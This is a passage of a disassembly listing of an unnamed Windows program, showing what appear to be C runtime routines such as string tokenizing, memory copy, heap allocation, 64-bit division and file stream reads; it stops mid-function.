; sub_40198E+BD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
pop ecx
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_40E202: ; CODE XREF: sub_40E1DE+3D�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_40E202
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_40E231
mov edx, dword_4C5954
jmp short loc_40E231
; ---------------------------------------------------------------------------
loc_40E22C: ; CODE XREF: sub_40E1DE+6A�j
test al, al
jz short loc_40E24A
inc edx
loc_40E231: ; CODE XREF: sub_40E1DE+44�j
; sub_40E1DE+4C�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_40E22C
loc_40E24A: ; CODE XREF: sub_40E1DE+50�j
mov ebx, edx
jmp short loc_40E266
; ---------------------------------------------------------------------------
loc_40E24E: ; CODE XREF: sub_40E1DE+8B�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_40E26D
inc edx
loc_40E266: ; CODE XREF: sub_40E1DE+6E�j
cmp byte ptr [edx], 0
jnz short loc_40E24E
jmp short loc_40E271
; ---------------------------------------------------------------------------
loc_40E26D: ; CODE XREF: sub_40E1DE+85�j
and byte ptr [edx], 0
inc edx
loc_40E271: ; CODE XREF: sub_40E1DE+8D�j
mov ecx, [ebp+var_4]
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
mov dword_4C5954, edx
pop ebx
call sub_411BA5
leave
retn
sub_40E1DE endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40E292 proc near ; CODE XREF: sub_40E2CA�p
mov eax, offset sub_411F45
mov off_421364, eax
mov off_421368, offset sub_411C0B
mov off_42136C, offset sub_411C70
mov off_421370, offset sub_411BB3
mov off_421374, offset sub_411C56
mov off_421378, eax
retn
sub_40E292 endp
; =============== S U B R O U T I N E =======================================
sub_40E2CA proc near ; CODE XREF: sub_40DD0D+39�p
; sub_411FE8+21�p
; DATA XREF: ...
call sub_40E292
call sub_411FE8
mov dword_4C595C, eax
call sub_411F96
fnclex
retn
sub_40E2CA endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E2E4 proc near ; CODE XREF: sub_40198E+1B5A�p
; sub_40198E+2997�p ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_40E343
loc_40E307: ; CODE XREF: sub_40E2E4+69�j
fsubp st(1), st
test edx, edx
jns short loc_40E32B
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_40E357
; ---------------------------------------------------------------------------
loc_40E32B: ; CODE XREF: sub_40E2E4+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_40E357
; ---------------------------------------------------------------------------
loc_40E343: ; CODE XREF: sub_40E2E4+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_40E307
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_40E357: ; CODE XREF: sub_40E2E4+45�j
; sub_40E2E4+5D�j
leave
retn
sub_40E2E4 endp
; =============== S U B R O U T I N E =======================================
sub_40E359 proc near ; CODE XREF: sub_4056A2+231�p
; sub_405E21+68�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40E38F
cmp dword_4C5B68, 3
push esi
jnz short loc_40E381
call sub_4120C4
test eax, eax
pop ecx
push esi
jz short loc_40E381
push eax
call sub_4120EF
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E381: ; CODE XREF: sub_40E359+11�j
; sub_40E359+1C�j
push 0
push dword_4C5B64
call dword_4191B4 ; RtlFreeHeap
loc_40E38F: ; CODE XREF: sub_40E359+7�j
pop esi
retn
sub_40E359 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E3A0 proc near ; CODE XREF: sub_4056A2+15A�p
; sub_406676+93�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_40E3C0
cmp edi, eax
jb loc_40E53C
loc_40E3C0: ; CODE XREF: sub_40E3A0+16�j
test edi, 3
jnz short loc_40E3DC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40E3FC
rep movsd
jmp off_40E4EC[edx*4]
; ---------------------------------------------------------------------------
loc_40E3DC: ; CODE XREF: sub_40E3A0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40E3F4
and eax, 3
add ecx, eax
jmp dword ptr loc_40E3FC+4[eax*4]
; ---------------------------------------------------------------------------
loc_40E3F4: ; CODE XREF: sub_40E3A0+46�j
jmp dword ptr loc_40E4FC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40E3FC: ; CODE XREF: sub_40E3A0+31�j
; sub_40E3A0+8E�j ...
jmp off_40E480[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_40E410
dd offset loc_40E43C
dd offset loc_40E460
; ---------------------------------------------------------------------------
loc_40E410: ; DATA XREF: sub_40E3A0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40E3FC
rep movsd
jmp off_40E4EC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40E43C: ; DATA XREF: sub_40E3A0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40E3FC
rep movsd
jmp off_40E4EC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40E460: ; DATA XREF: sub_40E3A0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_40E3FC
rep movsd
jmp off_40E4EC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_40E480 dd offset loc_40E4E3 ; DATA XREF: sub_40E3A0:loc_40E3FC�r
dd offset loc_40E4D0
dd offset loc_40E4C8
dd offset loc_40E4C0
dd offset loc_40E4B8
dd offset loc_40E4B0
dd offset loc_40E4A8
dd offset loc_40E4A0
; ---------------------------------------------------------------------------
loc_40E4A0: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_40E4A8: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40E4B0: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_40E4B8: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40E4C0: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_40E4C8: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40E4D0: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40E4E3: ; CODE XREF: sub_40E3A0:loc_40E3FC�j
; DATA XREF: sub_40E3A0:off_40E480�o
jmp off_40E4EC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40E4EC dd offset loc_40E4FC ; DATA XREF: sub_40E3A0+35�r
; sub_40E3A0+92�r ...
dd offset loc_40E504
dd offset loc_40E510
dd offset loc_40E524
; ---------------------------------------------------------------------------
loc_40E4FC: ; CODE XREF: sub_40E3A0+35�j
; sub_40E3A0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40E504: ; CODE XREF: sub_40E3A0+35�j
; sub_40E3A0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40E510: ; CODE XREF: sub_40E3A0+35�j
; sub_40E3A0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40E524: ; CODE XREF: sub_40E3A0+35�j
; sub_40E3A0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40E53C: ; CODE XREF: sub_40E3A0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40E570
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40E564
std
rep movsd
cld
jmp off_40E688[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40E564: ; CODE XREF: sub_40E3A0+1B5�j
; sub_40E3A0+210�j ...
neg ecx
jmp off_40E638[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40E570: ; CODE XREF: sub_40E3A0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_40E588
and eax, 3
sub ecx, eax
jmp dword ptr loc_40E588+4[eax*4]
; ---------------------------------------------------------------------------
loc_40E588: ; CODE XREF: sub_40E3A0+1DA�j
; DATA XREF: sub_40E3A0+1E1�r
jmp off_40E688[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_40E59C
dd offset loc_40E5C0
dd offset loc_40E5E8
; ---------------------------------------------------------------------------
loc_40E59C: ; DATA XREF: sub_40E3A0+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40E564
std
rep movsd
cld
jmp off_40E688[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40E5C0: ; DATA XREF: sub_40E3A0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_40E564
std
rep movsd
cld
jmp off_40E688[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40E5E8: ; DATA XREF: sub_40E3A0+1F8�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40E564
std
rep movsd
cld
jmp off_40E688[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_40E63C
dd offset loc_40E644
dd offset loc_40E64C
dd offset loc_40E654
dd offset loc_40E65C
dd offset loc_40E664
dd offset loc_40E66C
off_40E638 dd offset loc_40E67F ; DATA XREF: sub_40E3A0+1C6�r
; ---------------------------------------------------------------------------
loc_40E63C: ; DATA XREF: sub_40E3A0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40E644: ; DATA XREF: sub_40E3A0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_40E64C: ; DATA XREF: sub_40E3A0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40E654: ; DATA XREF: sub_40E3A0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_40E65C: ; DATA XREF: sub_40E3A0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40E664: ; DATA XREF: sub_40E3A0+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_40E66C: ; DATA XREF: sub_40E3A0+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40E67F: ; CODE XREF: sub_40E3A0+1C6�j
; DATA XREF: sub_40E3A0:off_40E638�o
jmp off_40E688[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40E688 dd offset loc_40E698 ; DATA XREF: sub_40E3A0+1BB�r
; sub_40E3A0:loc_40E588�r ...
dd offset loc_40E6A0
dd offset loc_40E6B0
dd offset loc_40E6C4
; ---------------------------------------------------------------------------
loc_40E698: ; CODE XREF: sub_40E3A0+1BB�j
; sub_40E3A0:loc_40E588�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40E6A0: ; CODE XREF: sub_40E3A0+1BB�j
; sub_40E3A0:loc_40E588�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40E6B0: ; CODE XREF: sub_40E3A0+1BB�j
; sub_40E3A0:loc_40E588�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40E6C4: ; CODE XREF: sub_40E3A0+1BB�j
; sub_40E3A0:loc_40E588�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_40E3A0 endp
; =============== S U B R O U T I N E =======================================
sub_40E6DD proc near ; CODE XREF: sub_40E723+B�p
arg_0 = dword ptr 4
cmp dword_4C5B68, 3
push esi
mov esi, [esp+4+arg_0]
jnz short loc_40E6FE
cmp esi, dword_4C5B54
ja short loc_40E6FE
push esi
call sub_4128A3
test eax, eax
pop ecx
jnz short loc_40E721
loc_40E6FE: ; CODE XREF: sub_40E6DD+C�j
; sub_40E6DD+14�j
test esi, esi
jnz short loc_40E703
inc esi
loc_40E703: ; CODE XREF: sub_40E6DD+23�j
cmp dword_4C5B68, 1
jz short loc_40E712
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_40E712: ; CODE XREF: sub_40E6DD+2D�j
push esi
push 0
push dword_4C5B64
call dword_4191B8 ; RtlAllocateHeap
loc_40E721: ; CODE XREF: sub_40E6DD+1F�j
pop esi
retn
sub_40E6DD endp
; =============== S U B R O U T I N E =======================================
sub_40E723 proc near ; CODE XREF: sub_40E74F+A�p
; sub_40F6C6+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_40E74C
loc_40E72A: ; CODE XREF: sub_40E723+27�j
push [esp+arg_0]
call sub_40E6DD
test eax, eax
pop ecx
jnz short locret_40E74E
cmp [esp+arg_4], eax
jz short locret_40E74E
push [esp+arg_0]
call sub_412B9F
test eax, eax
pop ecx
jnz short loc_40E72A
loc_40E74C: ; CODE XREF: sub_40E723+5�j
xor eax, eax
locret_40E74E: ; CODE XREF: sub_40E723+13�j
; sub_40E723+19�j
retn
sub_40E723 endp
; =============== S U B R O U T I N E =======================================
sub_40E74F proc near ; CODE XREF: sub_4056A2+D7�p
; sub_405E21+21�p ...
arg_0 = dword ptr 4
push dword_4C5988
push [esp+4+arg_0]
call sub_40E723
pop ecx
pop ecx
retn
sub_40E74F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E770 proc near ; CODE XREF: sub_405B42+2C�p
; sub_40FBCF+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40E7A1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40E7E8
; ---------------------------------------------------------------------------
loc_40E7A1: ; CODE XREF: sub_40E770+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40E7AF: ; CODE XREF: sub_40E770+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40E7AF
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40E7DD
cmp edx, [esp+4+arg_4]
ja short loc_40E7DD
jb short loc_40E7E6
cmp eax, [esp+4+arg_0]
jbe short loc_40E7E6
loc_40E7DD: ; CODE XREF: sub_40E770+5D�j
; sub_40E770+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40E7E6: ; CODE XREF: sub_40E770+65�j
; sub_40E770+6B�j
xor ebx, ebx
loc_40E7E8: ; CODE XREF: sub_40E770+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40E770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E810 proc near ; CODE XREF: sub_405C48+5F�p
; sub_405C48+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_40E831
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_40E831: ; CODE XREF: sub_40E810+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_40E84D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_40E84D: ; CODE XREF: sub_40E810+27�j
or eax, eax
jnz short loc_40E869
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_40E8AA
; ---------------------------------------------------------------------------
loc_40E869: ; CODE XREF: sub_40E810+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_40E877: ; CODE XREF: sub_40E810+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_40E877
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_40E8A5
cmp edx, [esp+0Ch+arg_4]
ja short loc_40E8A5
jb short loc_40E8A6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_40E8A6
loc_40E8A5: ; CODE XREF: sub_40E810+85�j
; sub_40E810+8B�j
dec esi
loc_40E8A6: ; CODE XREF: sub_40E810+8D�j
; sub_40E810+93�j
xor edx, edx
mov eax, esi
loc_40E8AA: ; CODE XREF: sub_40E810+57�j
dec edi
jnz short loc_40E8B4
neg edx
neg eax
sbb edx, 0
loc_40E8B4: ; CODE XREF: sub_40E810+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_40E810 endp
; =============== S U B R O U T I N E =======================================
sub_40E8BA proc near ; CODE XREF: sub_40E8E4+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_412D81
test eax, eax
jnz short loc_40E8CE
mov dword_4C5904, 18h
retn
; ---------------------------------------------------------------------------
loc_40E8CE: ; CODE XREF: sub_40E8BA+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_412C19
add esp, 10h
retn
sub_40E8BA endp
; =============== S U B R O U T I N E =======================================
sub_40E8E4 proc near ; CODE XREF: sub_4060C7+17�p
; sub_406231+BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40E8BA
add esp, 0Ch
retn
sub_40E8E4 endp
; =============== S U B R O U T I N E =======================================
sub_40E8F7 proc near ; CODE XREF: sub_406231+1E7�p
; sub_408EF0+42B�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
push edi
or edi, 0FFFFFFFFh
test al, 40h
jz short loc_40E90C
or eax, 0FFFFFFFFh
jmp short loc_40E946
; ---------------------------------------------------------------------------
loc_40E90C: ; CODE XREF: sub_40E8F7+E�j
test al, 83h
jz short loc_40E944
push esi
call sub_410806
push esi
mov edi, eax
call sub_412EA6
push dword ptr [esi+10h]
call sub_412DF3
add esp, 0Ch
test eax, eax
jge short loc_40E932
or edi, 0FFFFFFFFh
jmp short loc_40E944
; ---------------------------------------------------------------------------
loc_40E932: ; CODE XREF: sub_40E8F7+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_40E944
push eax
call sub_40E359
and dword ptr [esi+1Ch], 0
pop ecx
loc_40E944: ; CODE XREF: sub_40E8F7+17�j
; sub_40E8F7+39�j ...
mov eax, edi
loc_40E946: ; CODE XREF: sub_40E8F7+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_40E8F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E94D proc near ; CODE XREF: sub_4060F4+26�p
; sub_408EF0+1B2�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_40E971
xor eax, eax
jmp loc_40EA1C
; ---------------------------------------------------------------------------
loc_40E971: ; CODE XREF: sub_40E94D+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_40E985
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_40E991
; ---------------------------------------------------------------------------
loc_40E985: ; CODE XREF: sub_40E94D+2E�j
mov [ebp+var_4], 1000h
jmp short loc_40E991
; ---------------------------------------------------------------------------
loc_40E98E: ; CODE XREF: sub_40E94D+C5�j
mov ecx, [ebp+arg_0]
loc_40E991: ; CODE XREF: sub_40E94D+36�j
; sub_40E94D+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_40E9C3
mov eax, [esi+4]
test eax, eax
jz short loc_40E9C3
cmp ecx, eax
mov edi, ecx
jb short loc_40E9A8
mov edi, eax
loc_40E9A8: ; CODE XREF: sub_40E94D+57�j
push edi
push dword ptr [esi]
push ebx
call sub_40E3A0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_40EA0E
; ---------------------------------------------------------------------------
loc_40E9C3: ; CODE XREF: sub_40E94D+4A�j
; sub_40E94D+51�j
cmp ecx, [ebp+var_4]
jb short loc_40E9F6
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_40E9D9
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_40E9D9: ; CODE XREF: sub_40E94D+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41050F
add esp, 0Ch
test eax, eax
jz short loc_40EA20
cmp eax, 0FFFFFFFFh
jz short loc_40EA30
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_40EA0E
; ---------------------------------------------------------------------------
loc_40E9F6: ; CODE XREF: sub_40E94D+79�j
push esi
call sub_40D9DD
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40EA24
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_40EA0E: ; CODE XREF: sub_40E94D+74�j
; sub_40E94D+A7�j
cmp [ebp+arg_0], 0
jnz loc_40E98E
mov eax, [ebp+arg_8]
loc_40EA1B: ; CODE XREF: sub_40E94D+E1�j
pop esi
loc_40EA1C: ; CODE XREF: sub_40E94D+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EA20: ; CODE XREF: sub_40E94D+9B�j
or dword ptr [esi+0Ch], 10h
loc_40EA24: ; CODE XREF: sub_40E94D+B3�j
; sub_40E94D+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_40EA1B
; ---------------------------------------------------------------------------
loc_40EA30: ; CODE XREF: sub_40E94D+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_40EA24
sub_40E94D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA36 proc near ; CODE XREF: sub_406231+12B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_40EA4A
xor eax, eax
jmp short loc_40EA80
; ---------------------------------------------------------------------------
loc_40EA4A: ; CODE XREF: sub_40EA36+E�j
dec [ebp+arg_4]
push esi
jz short loc_40EA7A
mov esi, [ebp+arg_8]
loc_40EA53: ; CODE XREF: sub_40EA36+42�j
dec dword ptr [esi+4]
js short loc_40EA62
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_40EA69
; ---------------------------------------------------------------------------
loc_40EA62: ; CODE XREF: sub_40EA36+20�j
push esi
call sub_40D9DD
pop ecx
loc_40EA69: ; CODE XREF: sub_40EA36+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_40EA84
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_40EA7A
dec [ebp+arg_4]
jnz short loc_40EA53
loc_40EA7A: ; CODE XREF: sub_40EA36+18�j
; sub_40EA36+3D�j ...
and byte ptr [edi], 0
loc_40EA7D: ; CODE XREF: sub_40EA36+55�j
mov eax, ebx
pop esi
loc_40EA80: ; CODE XREF: sub_40EA36+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EA84: ; CODE XREF: sub_40EA36+36�j
cmp edi, [ebp+arg_0]
jnz short loc_40EA7A
xor ebx, ebx
jmp short loc_40EA7D
sub_40EA36 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_40EAE2
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_40EAE3
test eax, 1
jz short loc_40EAC3
mov cl, [esi]
cmp cl, [edi]
jnz short loc_40EB10
add esi, 1
add edi, 1
sub eax, 1
jz short loc_40EAE0
loc_40EAC3: ; CODE XREF: .text:0040EAB0�j
; .text:0040EADE�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_40EB10
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_40EB10
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_40EAC3
loc_40EAE0: ; CODE XREF: .text:0040EAC1�j
; .text:0040EB1A�j
